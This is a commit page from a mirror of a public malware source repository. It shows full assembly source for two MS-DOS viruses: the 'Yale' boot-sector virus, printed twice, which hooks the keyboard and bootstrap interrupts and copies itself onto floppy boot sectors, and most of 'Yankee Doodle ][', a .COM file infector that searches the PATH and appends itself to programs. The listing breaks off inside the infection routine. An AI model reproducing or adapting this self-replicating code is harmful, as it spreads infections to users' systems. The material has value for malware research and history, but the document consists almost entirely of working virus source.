daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Y-Index/Virus.MSDOS.Unknown.y_yank1.asm
+1001
View File
File diff suppressed because it is too large Load Diff
MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm
+365
View File
@@ -0,0 +1,365 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
page 65,132
title The 'Yale' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Yale' Virus º
; º Disassembled by Joe Hirst, April 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus consists of a boot sector only on a floppy disk.
; The original boot sector is kept at track thirty-nine, head zero,
; sector eight.
; The disassembly has been tested by re-assembly using MASM 5.0
; Note that this does not create an identical program, as the original
; appears to have been assembled with A86
; MASM would not assemble the instruction at offset 003CH (7C3CH)
; This instruction is undefined on an 8088/8086, and illegal
; on a 80286/80386.
; The program requires an origin address of 7C00H for the first sector
; to load and run as a boot sector
; System variables are defined in either RAM or BOOT (or both)
; depending on the segment used by the program
RAM SEGMENT AT 400H
; System RAM fields
ORG 13H
BW0413 DW ? ; Total RAM size
ORG 17H
BB0417 DB ? ; Key toggles
ORG 72H
BW0472 DW ? ; System reset word
RAM ENDS
BOOT SEGMENT AT 0
; Interrupt addresses
ORG 24H
BW0024 DW ? ; Interrupt 9 offset
BW0026 DW ? ; Interrupt 9 segment
ORG 64H
BW0064 DW ? ; Interrupt 19H offset
BW0066 DW ? ; Interrupt 19H segment
; System RAM fields
ORG 410H
DW0410 DW ? ; System configuration
ORG 413H
DW0413 DW ? ; Total RAM size
; BIOS field
ORG 0E502H
DWE502 DW ?
BOOT ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING
START: CLI
XOR AX,AX ; \ Set SS to zero
MOV SS,AX ; /
MOV SP,7C00H ; Set stack before boot area
STI
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV AX,BW0413 ; Get size of RAM
MUL BX ; Convert to paragraphs
SUB AX,07E0H ; Subtract address after boot area
MOV ES,AX ; Target segment
ASSUME DS:CODE
PUSH CS ; \ Set DS to CS
POP DS ; /
CMP DI,3456H ; Simulated system reset?
JNE BP0010 ; Branch if not
DEC GENNUM[7C00H] ; Decrement generation number
BP0010: MOV SI,SP ; \ Address boot sector area
MOV DI,SI ; /
MOV CX,0200H ; 512 bytes to move
CLD
REPZ MOVSB ; Copy virus to high core
MOV SI,CX ; Address offset zero
MOV DI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
REPZ MOVSB ; Save first 32 interrupt pointers
CALL BP0030 ; Install interrupt 9 routine
PUSH ES ; \ Transfer to high core
; POP CS ; /
DB 0FH ; This is the previous instruction
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,SP ; Address boot sector area
MOV DX,CX ; A-drive, head zero
MOV CX,2708H ; Track 39, sector 8
MOV AX,0201H ; Read one sector
INT 13H ; Disk I/O
BP0020: JB BP0020 ; Loop on error
JMP BP0190
; Install interrupt 9 routine
BP0030: DEC DW0413 ; Decrement RAM size
MOV SI,OFFSET BW0024 ; Address INT 9 pointer
MOV DI,OFFSET INT_09+7C00H ; Target far jump
MOV CX,4 ; 4 bytes to copy
CLI
REPZ MOVSB ; Copy far address
MOV BW0024,OFFSET BP0050+7C00H ; Install new offset
MOV BW0026,ES ; Install new segment
STI
RET
; Ctrl-Alt-Del depressed - acknowledge keyboard signal
BP0040: IN AL,61H ; Get port B
MOV AH,AL ; Save current state
OR AL,80H ; Turn top bit on
OUT 61H,AL ; Set port B
XCHG AL,AH ; Get original state
OUT 61H,AL ; Reset port B
JMP SHORT BP0110
; Format table for track 39, head zero, 8 sectors (unused)
DB 027H, 000H, 001H, 002H
DB 027H, 000H, 002H, 002H
DB 027H, 000H, 003H, 002H
DB 027H, 000H, 004H, 002H
DB 027H, 000H, 005H, 002H
DB 027H, 000H, 006H, 002H
DB 027H, 000H, 007H, 002H
DB 027H, 000H, 008H, 002H
; Rubbish
DB 024H, 000H, 0ADH, 07CH, 0A3H, 026H, 000H, 059H
DB 05FH, 05EH, 007H, 01FH, 058H, 09DH, 0EAH, 011H
DB 011H, 011H, 011H
; Interrupt 9 routine
BP0050: PUSHF
STI
PUSH AX
PUSH BX
PUSH DS
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV BX,KYSTAT[7C00H] ; Get Ctrl & Alt key states
IN AL,60H ; Get keyboard token
MOV AH,AL ; Save keyboard token
AND AX,887FH
CMP AL,1DH ; Was key Ctrl?
JNE BP0060 ; Branch if not
MOV BL,AH ; Save Ctrl key state
JMP SHORT BP0080
BP0060: CMP AL,38H ; Was key Alt?
JNE BP0070 ; Branch if not
MOV BH,AH ; Save Alt key state
JMP SHORT BP0080
BP0070: CMP BX,0808H ; Are Ctrl & Alt depressed?
JNE BP0080 ; Branch if not
CMP AL,17H ; Is key I?
JE BP0100 ; Branch if yes
CMP AL,53H ; Is key Del?
JE BP0040 ; Branch if yes
BP0080: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
BP0090: POP DS
POP BX
POP AX
POPF
DB 0EAH ; Far jump to original INT 9
INT_09 DW 0E987H, 0F000H
; Pass on Ctrl-Alt-I
BP0100: JMP BP0240 ; Ctrl-Alt-I
; Ctrl-Alt-Del depressed - main processing
BP0110: MOV DX,03D8H ; VDU mode control address
MOV AX,0800H ; Delay eight cycles
OUT DX,AL ; Disable display
CALL BP0250 ; Delay
MOV KYSTAT[7C00H],AX ; Reset Ctrl & Alt key states
MOV AL,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Set cursor address function
XOR DX,DX ; Row zero, column zero
MOV BH,DH ; Page zero
INT 10H ; VDU I/O
MOV AH,1 ; Set cursor size function
MOV CX,0607H ; Cursor lines 6 to 7
INT 10H ; VDU I/O
MOV AX,0420H ; Delay 4 cycles
CALL BP0250 ; Delay
CLI
OUT 20H,AL ; End of interrupt
MOV ES,CX ; Address segment zero
MOV DI,CX ; Address offset zero
MOV SI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
CLD
REPZ MOVSB ; Restore first 32 interrupt pointers
MOV DS,CX ; Address zero
MOV BW0064,OFFSET BP0130+7C00H ; Install Int 19H offset
MOV BW0066,CS ; Install Int 19H segment
ASSUME DS:RAM
MOV AX,0040H ; \ Address RAM area
MOV DS,AX ; /
MOV BB0417,AH ; Set key toggles off
INC BW0413 ; Restore RAM size
PUSH DS
ASSUME DS:BOOT
MOV AX,0F000H ; \ Address BIOS
MOV DS,AX ; /
CMP DWE502,21E4H ; Is BIOS instruction IN AL,21H?
POP DS
JE BP0120 ; Branch if yes
INT 19H ; Disk bootstrap
BP0120: DB 0EAH ; Far jump to BIOS routine
DW 0E502H, 0F000H
; Interrupt 19H routine
ASSUME DS:BOOT
BP0130: XOR AX,AX ; \ Set DS to zero
MOV DS,AX ; /
MOV AX,DW0410 ; Get system configuration
TEST AL,1 ; Is there a floppy disk
JNZ BP0150 ; Branch if yes
BP0140: PUSH CS ; \ Set ES to CS
POP ES ; /
CALL BP0030 ; Install interrupt 9 routine
INT 18H ; Basica (IBM only)
BP0150: MOV CX,4 ; Retry four times
BP0160: PUSH CX ; Save retry count
MOV AH,0 ; Reset disk sub-system
INT 13H ; Disk I/O
JB BP0170 ; Branch if error
MOV AX,0201H ; Read one sector
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,7C00H ; Boot sector buffer
MOV CX,1 ; Track zero, sector one
INT 13H ; Disk I/O
BP0170: POP CX ; Retrieve retry count
JNB BP0180 ; Branch if no error
LOOP BP0160 ; Retry
JMP BP0140
BP0180: CMP DI,3456H ; Simulated system reset?
JNE BP0200 ; Branch if not
BP0190: DB 0EAH ; Far jump to boot sector area
DW 7C00H, 0
BP0200: MOV SI,7C00H ; Boot sector area
MOV CX,OFFSET INT_09 ; Length to compare
MOV DI,SI ; Virus offset
PUSH CS ; \ Set ES to CS
POP ES ; /
CLD
REPZ CMPSB ; Is boot sector infected?
JE BP0220 ; Branch if yes
INC ES:GENNUM[7C00H] ; Increment generation number
MOV BX,7C7AH ; Address format table
MOV DX,0 ; Head zero, drive zero
MOV CH,27H ; Track 39
MOV AH,5 ; Format track
JMP SHORT BP0210 ; This line was probably an INT 13H
JB BP0230 ; Error branch for deleted INT 13H
BP0210: MOV ES,DX ; \ Write from boot sector area
MOV BX,7C00H ; /
MOV CL,8 ; Sector eight
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
PUSH CS ; \ Set ES to CS
POP ES ; /
JB BP0230 ; Branch if error
MOV CX,1 ; Track zero, sector one
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
JB BP0230 ; Branch if error
BP0220: MOV DI,3456H ; Signal simulated system reset
INT 19H ; Disk bootstrap
BP0230: CALL BP0030 ; Install interrupt 9 routine
DEC ES:GENNUM[7C00H] ; Decrement generation number
JMP BP0190
; Ctrl-Alt-I
ASSUME DS:CODE
BP0240: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
MOV AX,GENNUM[7C00H] ; Get generation number
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV BW0472,AX ; Generation to system reset word
JMP BP0090 ; Pass on to original interrupt
; Delay
BP0250: SUB CX,CX ; Maximum count
BP0260: LOOP BP0260 ; Delay loop
SUB AH,1 ; Decrement count
JNZ BP0260 ; Repeat loop
RET
DB 027H, 000H, 008H, 002H ; Last sector of format table
GENNUM DW 016H ; Generation number
KYSTAT DW 0 ; Ctrl & Alt key states
DB 027H, 000H, 008H, 002H ; Last sector of format table
CODE ENDS
END START

MSDOS/Y-Index/Virus.MSDOS.Unknown.yale_asm.asm
+341
View File
@@ -0,0 +1,341 @@
page 65,132
title The 'Yale' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Yale' Virus º
; º Disassembled by Joe Hirst, April 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus consists of a boot sector only on a floppy disk.
; The original boot sector is kept at track thirty-nine, head zero,
; sector eight.
; The disassembly has been tested by re-assembly using MASM 5.0
; Note that this does not create an identical program, as the original
; appears to have been assembled with A86
; MASM would not assemble the instruction at offset 003CH (7C3CH)
; This instruction is undefined on an 8088/8086, and illegal
; on a 80286/80386.
; The program requires an origin address of 7C00H for the first sector
; to load and run as a boot sector
; System variables are defined in either RAM or BOOT (or both)
; depending on the segment used by the program
RAM SEGMENT AT 400H
; System RAM fields
ORG 13H
BW0413 DW ? ; Total RAM size
ORG 17H
BB0417 DB ? ; Key toggles
ORG 72H
BW0472 DW ? ; System reset word
RAM ENDS
BOOT SEGMENT AT 0
; Interrupt addresses
ORG 24H
BW0024 DW ? ; Interrupt 9 offset
BW0026 DW ? ; Interrupt 9 segment
ORG 64H
BW0064 DW ? ; Interrupt 19H offset
BW0066 DW ? ; Interrupt 19H segment
; System RAM fields
ORG 410H
DW0410 DW ? ; System configuration
ORG 413H
DW0413 DW ? ; Total RAM size
; BIOS field
ORG 0E502H
DWE502 DW ?
BOOT ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING
START: CLI
XOR AX,AX ; \ Set SS to zero
MOV SS,AX ; /
MOV SP,7C00H ; Set stack before boot area
STI
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV AX,BW0413 ; Get size of RAM
MUL BX ; Convert to paragraphs
SUB AX,07E0H ; Subtract address after boot area
MOV ES,AX ; Target segment
ASSUME DS:CODE
PUSH CS ; \ Set DS to CS
POP DS ; /
CMP DI,3456H ; Simulated system reset?
JNE BP0010 ; Branch if not
DEC GENNUM[7C00H] ; Decrement generation number
BP0010: MOV SI,SP ; \ Address boot sector area
MOV DI,SI ; /
MOV CX,0200H ; 512 bytes to move
CLD
REPZ MOVSB ; Copy virus to high core
MOV SI,CX ; Address offset zero
MOV DI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
REPZ MOVSB ; Save first 32 interrupt pointers
CALL BP0030 ; Install interrupt 9 routine
PUSH ES ; \ Transfer to high core
; POP CS ; /
DB 0FH ; This is the previous instruction
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,SP ; Address boot sector area
MOV DX,CX ; A-drive, head zero
MOV CX,2708H ; Track 39, sector 8
MOV AX,0201H ; Read one sector
INT 13H ; Disk I/O
BP0020: JB BP0020 ; Loop on error
JMP BP0190
; Install interrupt 9 routine
BP0030: DEC DW0413 ; Decrement RAM size
MOV SI,OFFSET BW0024 ; Address INT 9 pointer
MOV DI,OFFSET INT_09+7C00H ; Target far jump
MOV CX,4 ; 4 bytes to copy
CLI
REPZ MOVSB ; Copy far address
MOV BW0024,OFFSET BP0050+7C00H ; Install new offset
MOV BW0026,ES ; Install new segment
STI
RET
; Ctrl-Alt-Del depressed - acknowledge keyboard signal
BP0040: IN AL,61H ; Get port B
MOV AH,AL ; Save current state
OR AL,80H ; Turn top bit on
OUT 61H,AL ; Set port B
XCHG AL,AH ; Get original state
OUT 61H,AL ; Reset port B
JMP SHORT BP0110
; Format table for track 39, head zero, 8 sectors (unused)
DB 027H, 000H, 001H, 002H
DB 027H, 000H, 002H, 002H
DB 027H, 000H, 003H, 002H
DB 027H, 000H, 004H, 002H
DB 027H, 000H, 005H, 002H
DB 027H, 000H, 006H, 002H
DB 027H, 000H, 007H, 002H
DB 027H, 000H, 008H, 002H
; Rubbish
DB 024H, 000H, 0ADH, 07CH, 0A3H, 026H, 000H, 059H
DB 05FH, 05EH, 007H, 01FH, 058H, 09DH, 0EAH, 011H
DB 011H, 011H, 011H
; Interrupt 9 routine
BP0050: PUSHF
STI
PUSH AX
PUSH BX
PUSH DS
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV BX,KYSTAT[7C00H] ; Get Ctrl & Alt key states
IN AL,60H ; Get keyboard token
MOV AH,AL ; Save keyboard token
AND AX,887FH
CMP AL,1DH ; Was key Ctrl?
JNE BP0060 ; Branch if not
MOV BL,AH ; Save Ctrl key state
JMP SHORT BP0080
BP0060: CMP AL,38H ; Was key Alt?
JNE BP0070 ; Branch if not
MOV BH,AH ; Save Alt key state
JMP SHORT BP0080
BP0070: CMP BX,0808H ; Are Ctrl & Alt depressed?
JNE BP0080 ; Branch if not
CMP AL,17H ; Is key I?
JE BP0100 ; Branch if yes
CMP AL,53H ; Is key Del?
JE BP0040 ; Branch if yes
BP0080: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
BP0090: POP DS
POP BX
POP AX
POPF
DB 0EAH ; Far jump to original INT 9
INT_09 DW 0E987H, 0F000H
; Pass on Ctrl-Alt-I
BP0100: JMP BP0240 ; Ctrl-Alt-I
; Ctrl-Alt-Del depressed - main processing
BP0110: MOV DX,03D8H ; VDU mode control address
MOV AX,0800H ; Delay eight cycles
OUT DX,AL ; Disable display
CALL BP0250 ; Delay
MOV KYSTAT[7C00H],AX ; Reset Ctrl & Alt key states
MOV AL,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Set cursor address function
XOR DX,DX ; Row zero, column zero
MOV BH,DH ; Page zero
INT 10H ; VDU I/O
MOV AH,1 ; Set cursor size function
MOV CX,0607H ; Cursor lines 6 to 7
INT 10H ; VDU I/O
MOV AX,0420H ; Delay 4 cycles
CALL BP0250 ; Delay
CLI
OUT 20H,AL ; End of interrupt
MOV ES,CX ; Address segment zero
MOV DI,CX ; Address offset zero
MOV SI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
CLD
REPZ MOVSB ; Restore first 32 interrupt pointers
MOV DS,CX ; Address zero
MOV BW0064,OFFSET BP0130+7C00H ; Install Int 19H offset
MOV BW0066,CS ; Install Int 19H segment
ASSUME DS:RAM
MOV AX,0040H ; \ Address RAM area
MOV DS,AX ; /
MOV BB0417,AH ; Set key toggles off
INC BW0413 ; Restore RAM size
PUSH DS
ASSUME DS:BOOT
MOV AX,0F000H ; \ Address BIOS
MOV DS,AX ; /
CMP DWE502,21E4H ; Is BIOS instruction IN AL,21H?
POP DS
JE BP0120 ; Branch if yes
INT 19H ; Disk bootstrap
BP0120: DB 0EAH ; Far jump to BIOS routine
DW 0E502H, 0F000H
; Interrupt 19H routine
ASSUME DS:BOOT
BP0130: XOR AX,AX ; \ Set DS to zero
MOV DS,AX ; /
MOV AX,DW0410 ; Get system configuration
TEST AL,1 ; Is there a floppy disk
JNZ BP0150 ; Branch if yes
BP0140: PUSH CS ; \ Set ES to CS
POP ES ; /
CALL BP0030 ; Install interrupt 9 routine
INT 18H ; Basica (IBM only)
BP0150: MOV CX,4 ; Retry four times
BP0160: PUSH CX ; Save retry count
MOV AH,0 ; Reset disk sub-system
INT 13H ; Disk I/O
JB BP0170 ; Branch if error
MOV AX,0201H ; Read one sector
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,7C00H ; Boot sector buffer
MOV CX,1 ; Track zero, sector one
INT 13H ; Disk I/O
BP0170: POP CX ; Retrieve retry count
JNB BP0180 ; Branch if no error
LOOP BP0160 ; Retry
JMP BP0140
BP0180: CMP DI,3456H ; Simulated system reset?
JNE BP0200 ; Branch if not
BP0190: DB 0EAH ; Far jump to boot sector area
DW 7C00H, 0
BP0200: MOV SI,7C00H ; Boot sector area
MOV CX,OFFSET INT_09 ; Length to compare
MOV DI,SI ; Virus offset
PUSH CS ; \ Set ES to CS
POP ES ; /
CLD
REPZ CMPSB ; Is boot sector infected?
JE BP0220 ; Branch if yes
INC ES:GENNUM[7C00H] ; Increment generation number
MOV BX,7C7AH ; Address format table
MOV DX,0 ; Head zero, drive zero
MOV CH,27H ; Track 39
MOV AH,5 ; Format track
JMP SHORT BP0210 ; This line was probably an INT 13H
JB BP0230 ; Error branch for deleted INT 13H
BP0210: MOV ES,DX ; \ Write from boot sector area
MOV BX,7C00H ; /
MOV CL,8 ; Sector eight
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
PUSH CS ; \ Set ES to CS
POP ES ; /
JB BP0230 ; Branch if error
MOV CX,1 ; Track zero, sector one
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
JB BP0230 ; Branch if error
BP0220: MOV DI,3456H ; Signal simulated system reset
INT 19H ; Disk bootstrap
BP0230: CALL BP0030 ; Install interrupt 9 routine
DEC ES:GENNUM[7C00H] ; Decrement generation number
JMP BP0190
; Ctrl-Alt-I
ASSUME DS:CODE
BP0240: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
MOV AX,GENNUM[7C00H] ; Get generation number
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV BW0472,AX ; Generation to system reset word
JMP BP0090 ; Pass on to original interrupt
; Delay
BP0250: SUB CX,CX ; Maximum count
BP0260: LOOP BP0260 ; Delay loop
SUB AH,1 ; Decrement count
JNZ BP0260 ; Repeat loop
RET
DB 027H, 000H, 008H, 002H ; Last sector of format table
GENNUM DW 016H ; Generation number
KYSTAT DW 0 ; Ctrl & Alt key states
DB 027H, 000H, 008H, 002H ; Last sector of format table
CODE ENDS
END START
MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm
+342
View File
@@ -0,0 +1,342 @@
; YANKEE2.ASM -- Yankee Doodle ][
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call search_files ; Find and infect a file
call search_files ; Find and infect another file
call get_hour
cmp ax,0011h ; Did the function return 17?
jle skip00 ; If less that or equal, skip effect
cmp ax,0013h ; Did the function return 19?
jge skip00 ; If greater than or equal, skip effect
jmp short strt00 ; Success -- skip jump
skip00: jmp end00 ; Skip the routine
strt00: lea si,[di + data00] ; SI points to data
get_note: mov bx,[si] ; Load BX with the frequency
or bx,bx ; Is BX equal to zero?
je play_tune_done ; If it is we are finished
mov ax,034DDh ;
mov dx,0012h ;
cmp dx,bx ;
jnb new_note ;
div bx ; This bit here was stolen
mov bx,ax ; from the Turbo C++ v1.0
in al,061h ; library file CS.LIB. I
test al,3 ; extracted sound() from the
jne skip_an_or ; library and linked it to
or al,3 ; an .EXE file, then diassembled
out 061h,al ; it. Basically this turns
mov al,0B6h ; on the speaker at a certain
out 043h,al ; frequency.
skip_an_or: mov al,bl ;
out 042h,al ;
mov al,bh ;
out 042h,al ;
mov bx,[si + 2] ; BX holds duration value
xor ah,ah ; BIOS get time function
int 1Ah
add bx,dx ; Add the time to the length
wait_loop: int 1Ah ; Get the time again (AH = 0)
cmp dx,bx ; Is the delay over?
jne wait_loop ; Repeat until it is
in al,061h ; Stolen from the nosound()
and al,0FCh ; procedure in Turbo C++ v1.0.
out 061h,al ; This turns off the speaker.
new_note: add si,4 ; SI points to next note
jmp short get_note ; Repeat with the next note
play_tune_done:
end00:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
mov bx,di ; BX points to the virus
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call traverse_path ; Start the traversal
traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
lea dx,[bx + com_mask] ; DX points to "*.COM"
push di
mov di,bx
call find_files ; Try to infect a .COM file
mov bx,di
pop di
jnc done_searching ; If successful the exit
jmp short traversal_loop ; Keep checking the PATH
done_searching: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not then exit
stc ; Set the carry flag for failure
at_least_tried: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db "*.COM",0 ; Mask for all .COM files
search_files endp
traverse_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment
xor di,di ; DI holds the starting offset
find_path: lea si,[bx + path_string] ; SI points to "PATH="
lodsb ; Load the "P" into AL
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of "PATH="
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking
mov word ptr [bx + path_ad],di ; Save the PATH address
mov word ptr [bx + path_ad + 2],es ; Save the PATH's segment
ret ; Return to caller
path_string db "PATH=" ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
traverse_path endp
found_subdir proc near
lds si,dword ptr [bx + path_ad] ; DS:SI points to PATH
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_subdir: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_subdir ; Keep transfering characters
moved_last_one: xor si,si ; Zero SI to signal completion
moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the path address
ret ; Return to caller
found_subdir endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
